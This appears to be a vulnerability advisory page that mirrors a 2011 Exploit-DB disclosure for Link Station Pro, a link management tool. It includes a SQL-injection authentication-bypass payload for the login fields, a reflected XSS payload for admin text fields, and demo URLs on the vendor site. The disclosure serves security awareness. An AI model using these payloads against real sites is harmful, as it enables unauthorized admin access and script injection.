Link Station Pro Multiple Vulnerabilities

vendor:

Link Station Pro

by:

Raghavendra Karthik D

8.8

CVSS

HIGH

Authentication Bypass and Reflected XSS

89, 79

CWE

Product Name: Link Station Pro

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

Link Station Pro Multiple Vulnerabilities

Link Station Pro is without doubt, the most efficient, easiest and most configurable reciprocal link management tool available for all your reciprocal link requirements. Attackers can use Authentication Bypass to get into Admin Panel in the site. Reflected XSS Vulnerability can be exploited in admin panel(in most of the text fields)

Mitigation:

Implement proper authentication and authorization mechanisms, use input validation and output encoding techniques to prevent XSS attacks

Source

Exploit-DB raw data:

                                              %+
$.......#........4.........|)........0............\/\/       %+


                                              %+
                                                       %+


%++++++++++++++++++++++++++++++++++++++++


# Exploit Title: Link Station Pro Multiple Vulnerabilities
# Vendor:  www.linkstationpro.com
# Date: 28th july,2011
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D (
http://www.shadowrootkit.wordpress.com)
# Google Dork:  � 2011 Copyright SteveDawson.com
*****************************************************************************************************************************************************************************************
BREIF DESCRIPTION
*****************************
 Link Station Pro is without doubt, the most efficient, easiest and most
configurable reciprocal link management tool available for all your
reciprocal link requirements.

******************************************************************************************************************************************************************************************

(Auth ByPass) SQLi Vulnerability
***************************************
{DEMO} : http://www.linkstationpro.com/Partners/admindemo/index.php

EXPLOIT:
                 Username: ' or 'bug'='bug' #
                 Password: ' or 'bug'='bug' #
Observe: Attackers can use Authentication Bypass to get into Admin Panel in
the site.

Reflected XSS Vulnerability
********************************
EXPLOIT 2:  XSS Vulnerability in admin panel(in most of the text fields)

   {Demo}:
http://www.linkstationpro.com/Partners/admindemo/manage_categories.php
    Exploit:  ">><marquee><h1>XSSed_by_r007k17</h1></marquee>

*****************************************************************************************************************************************************************************************
gr33t1ngs to s1d3 effects and my friends@!3.14--
*****************************************************************************************************************************************************************************************